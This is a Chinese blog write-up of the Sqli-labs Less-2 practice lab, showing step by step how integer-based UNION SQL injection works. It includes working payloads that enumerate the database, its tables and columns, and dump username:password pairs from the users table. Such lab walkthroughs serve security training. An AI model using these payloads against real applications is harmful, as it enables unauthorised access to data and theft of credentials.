Sqli-labs Less-2 Union注入

 
更多

打开页面后,与Less-1一样,提示“请输入参数id,并为它赋一个数字值”。

1、寻找注入点

输入?id=1 正常;输入?id=1′ 报错,说明存在sql注入漏洞。

查看后台源码发现如下查询语句,说明存在整型注入漏洞。与Less-1 单引号字符型注入 区别在于,构建payload时去掉’单引号。

SELECT * FROM users WHERE id=$id LIMIT 0,1

2、查询该数据表中的字段数量

输入?id=1 order by 3 –+ 正常;

输入?id=1 order by 4 –+ 报错,说明该数据表中字段数为3。

3、爆数据库

?id=-1 union select 1,2,database() --+

4、爆数据表

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

5、爆数据列(字段)

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6、爆数据值

?id=-1 union select 1,2,group_concat(username,0x3a,password) from users--+

打赏

本文固定链接: https://www.cxy163.net/archives/5005 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-2 Union注入 | 绝缘体
关键字: , , , ,

Sqli-labs Less-2 Union注入:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter